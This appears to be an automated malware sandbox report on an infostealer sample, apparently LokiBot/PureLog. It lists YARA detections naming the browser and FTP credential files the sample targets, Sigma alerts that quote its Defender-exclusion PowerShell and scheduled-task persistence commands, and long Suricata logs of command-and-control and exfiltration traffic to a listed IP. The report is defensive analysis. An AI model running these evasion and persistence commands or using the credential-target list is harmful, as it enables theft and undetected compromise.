0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.ZeJFfrYmOnJKS.exe.28dde98.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FVR-N2411-07396.exe.2a6ddb0.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.FVR-N2411-07396.exe.2a65d98.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 45 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", ProcessId: 6420, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe, ParentImage: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe, ParentProcessId: 1436, ParentProcessName: ZeJFfrYmOnJKS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp", ProcessId: 5516, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", ProcessId: 1124, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe", ProcessId: 6420, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\FVR-N2411-07396.exe", ParentImage: C:\Users\user\Desktop\FVR-N2411-07396.exe, ParentProcessId: 2668, ParentProcessName: FVR-N2411-07396.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp", ProcessId: 1124, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:52:05.944288+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:07.903841+0100	2024312	1	A Network Trojan was detected	192.168.2.5	49709	94.156.177.41	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:52:04.479690+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49708	94.156.177.41	80	TCP
2024-11-28T13:52:06.410511+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49709	94.156.177.41	80	TCP
2024-11-28T13:52:08.237689+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:10.072483+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:11.973667+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:13.689499+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:15.393770+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:17.219155+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:19.113785+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:20.813749+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:22.659042+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:24.549789+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:26.365633+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:28.268944+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:29.992184+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:31.691657+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:33.568487+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:35.425401+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:37.177766+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:38.836045+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:40.534388+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:42.351772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:44.168555+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:46.067495+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:48.007586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:49.915881+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:51.665645+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:53.728329+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:55.529063+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:58.217591+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:53:00.334231+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:02.019879+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:03.878356+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:05.737923+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:07.602577+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:09.650403+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:11.943752+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:13.787378+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:15.696851+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:17.383644+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:19.396128+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:21.301001+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:23.160248+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:24.944914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:26.713138+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:28.528184+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:30.675910+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:32.490598+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:34.319262+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49913	94.156.177.41	80	TCP
2024-11-28T13:53:36.174269+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49917	94.156.177.41	80	TCP
2024-11-28T13:53:38.049671+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49923	94.156.177.41	80	TCP
2024-11-28T13:53:39.893533+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49928	94.156.177.41	80	TCP
2024-11-28T13:53:42.038877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.41	80	TCP
2024-11-28T13:53:43.814508+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49936	94.156.177.41	80	TCP
2024-11-28T13:53:45.677207+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49942	94.156.177.41	80	TCP
2024-11-28T13:53:47.609817+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49948	94.156.177.41	80	TCP
2024-11-28T13:53:49.229391+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49951	94.156.177.41	80	TCP
2024-11-28T13:53:51.134807+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49954	94.156.177.41	80	TCP
2024-11-28T13:53:52.989363+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.41	80	TCP
2024-11-28T13:53:54.895598+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.41	80	TCP
2024-11-28T13:53:56.768164+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49970	94.156.177.41	80	TCP
2024-11-28T13:53:58.476192+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49975	94.156.177.41	80	TCP
2024-11-28T13:54:00.536337+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49979	94.156.177.41	80	TCP
2024-11-28T13:54:02.191446+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:51:55.400275+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49824	TCP
2024-11-28T13:52:09.634906+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49711	TCP
2024-11-28T13:52:11.714786+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49712	TCP
2024-11-28T13:52:13.412589+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49713	TCP
2024-11-28T13:52:15.135212+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49714	TCP
2024-11-28T13:52:16.939118+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49715	TCP
2024-11-28T13:52:18.855201+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49718	TCP
2024-11-28T13:52:20.553024+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49721	TCP
2024-11-28T13:52:22.400000+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49724	TCP
2024-11-28T13:52:24.292204+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49726	TCP
2024-11-28T13:52:26.096508+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49727	TCP
2024-11-28T13:52:27.994452+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49733	TCP
2024-11-28T13:52:29.713774+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49739	TCP
2024-11-28T13:52:31.448629+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49745	TCP
2024-11-28T13:52:33.133068+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49750	TCP
2024-11-28T13:52:35.152257+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49751	TCP
2024-11-28T13:52:36.915264+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49757	TCP
2024-11-28T13:52:38.578089+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49762	TCP
2024-11-28T13:52:40.274183+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49768	TCP
2024-11-28T13:52:42.077928+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49771	TCP
2024-11-28T13:52:43.903449+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49775	TCP
2024-11-28T13:52:45.798995+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49781	TCP
2024-11-28T13:52:47.611903+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49785	TCP
2024-11-28T13:52:49.639320+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49791	TCP
2024-11-28T13:52:51.399558+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49797	TCP
2024-11-28T13:52:53.296816+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49801	TCP
2024-11-28T13:52:55.240089+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49806	TCP
2024-11-28T13:52:57.940552+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49811	TCP
2024-11-28T13:52:59.760272+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49818	TCP
2024-11-28T13:53:03.610341+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49829	TCP
2024-11-28T13:53:05.477095+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49833	TCP
2024-11-28T13:53:07.328140+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49837	TCP
2024-11-28T13:53:09.234121+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49840	TCP
2024-11-28T13:53:11.676387+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49845	TCP
2024-11-28T13:53:13.531949+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49851	TCP
2024-11-28T13:53:15.423126+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49857	TCP
2024-11-28T13:53:17.088676+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49862	TCP
2024-11-28T13:53:18.978807+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49867	TCP
2024-11-28T13:53:21.030551+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49871	TCP
2024-11-28T13:53:22.903350+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49877	TCP
2024-11-28T13:53:24.624213+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49882	TCP
2024-11-28T13:53:26.440822+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49888	TCP
2024-11-28T13:53:28.260281+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49893	TCP
2024-11-28T13:53:30.188659+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49897	TCP
2024-11-28T13:53:32.227331+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49902	TCP
2024-11-28T13:53:34.031647+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49908	TCP
2024-11-28T13:53:35.912159+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49913	TCP
2024-11-28T13:53:37.791691+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49917	TCP
2024-11-28T13:53:39.637803+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49923	TCP
2024-11-28T13:53:41.452206+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49928	TCP
2024-11-28T13:53:43.586239+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49931	TCP
2024-11-28T13:53:45.416486+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49936	TCP
2024-11-28T13:53:47.269321+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49942	TCP
2024-11-28T13:53:48.954029+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49948	TCP
2024-11-28T13:53:50.857824+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49951	TCP
2024-11-28T13:53:52.724013+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49954	TCP
2024-11-28T13:53:54.624745+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49959	TCP
2024-11-28T13:53:56.476885+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49965	TCP
2024-11-28T13:53:58.209770+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49970	TCP
2024-11-28T13:54:00.112160+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49975	TCP
2024-11-28T13:54:01.933027+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49979	TCP
2024-11-28T13:54:03.631691+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.5	49984	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-28T13:52:09.514500+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49711	94.156.177.41	80	TCP
2024-11-28T13:52:11.594715+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49712	94.156.177.41	80	TCP
2024-11-28T13:52:13.292548+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49713	94.156.177.41	80	TCP
2024-11-28T13:52:15.014454+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49714	94.156.177.41	80	TCP
2024-11-28T13:52:16.819103+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49715	94.156.177.41	80	TCP
2024-11-28T13:52:18.734775+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49718	94.156.177.41	80	TCP
2024-11-28T13:52:20.433012+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49721	94.156.177.41	80	TCP
2024-11-28T13:52:22.280016+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49724	94.156.177.41	80	TCP
2024-11-28T13:52:24.172204+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49726	94.156.177.41	80	TCP
2024-11-28T13:52:25.972126+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49727	94.156.177.41	80	TCP
2024-11-28T13:52:27.874307+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49733	94.156.177.41	80	TCP
2024-11-28T13:52:29.593699+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49739	94.156.177.41	80	TCP
2024-11-28T13:52:31.306295+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49745	94.156.177.41	80	TCP
2024-11-28T13:52:33.012667+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49750	94.156.177.41	80	TCP
2024-11-28T13:52:35.032116+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49751	94.156.177.41	80	TCP
2024-11-28T13:52:36.795234+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49757	94.156.177.41	80	TCP
2024-11-28T13:52:38.452387+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49762	94.156.177.41	80	TCP
2024-11-28T13:52:40.154060+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49768	94.156.177.41	80	TCP
2024-11-28T13:52:41.957950+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.41	80	TCP
2024-11-28T13:52:43.776505+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49775	94.156.177.41	80	TCP
2024-11-28T13:52:45.678418+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49781	94.156.177.41	80	TCP
2024-11-28T13:52:47.491806+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.41	80	TCP
2024-11-28T13:52:49.519282+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49791	94.156.177.41	80	TCP
2024-11-28T13:52:51.273383+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49797	94.156.177.41	80	TCP
2024-11-28T13:52:53.173277+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.41	80	TCP
2024-11-28T13:52:55.119928+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49806	94.156.177.41	80	TCP
2024-11-28T13:52:57.817541+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.41	80	TCP
2024-11-28T13:52:59.638447+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49818	94.156.177.41	80	TCP
2024-11-28T13:53:01.635518+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49824	94.156.177.41	80	TCP
2024-11-28T13:53:03.488071+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49829	94.156.177.41	80	TCP
2024-11-28T13:53:05.350722+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49833	94.156.177.41	80	TCP
2024-11-28T13:53:07.207826+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49837	94.156.177.41	80	TCP
2024-11-28T13:53:09.114132+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49840	94.156.177.41	80	TCP
2024-11-28T13:53:11.552901+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.41	80	TCP
2024-11-28T13:53:13.408228+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.41	80	TCP
2024-11-28T13:53:15.303148+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49857	94.156.177.41	80	TCP
2024-11-28T13:53:16.968396+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.41	80	TCP
2024-11-28T13:53:18.852419+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49867	94.156.177.41	80	TCP
2024-11-28T13:53:20.910013+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49871	94.156.177.41	80	TCP
2024-11-28T13:53:22.780609+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49877	94.156.177.41	80	TCP
2024-11-28T13:53:24.492850+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49882	94.156.177.41	80	TCP
2024-11-28T13:53:26.320757+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49888	94.156.177.41	80	TCP
2024-11-28T13:53:28.140273+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49893	94.156.177.41	80	TCP
2024-11-28T13:53:30.067360+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.41	80	TCP
2024-11-28T13:53:32.107303+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49902	94.156.177.41	80	TCP
2024-11-28T13:53:33.909974+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49908	94.156.177.41	80	TCP
2024-11-28T13:53:35.792109+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49913	94.156.177.41	80	TCP
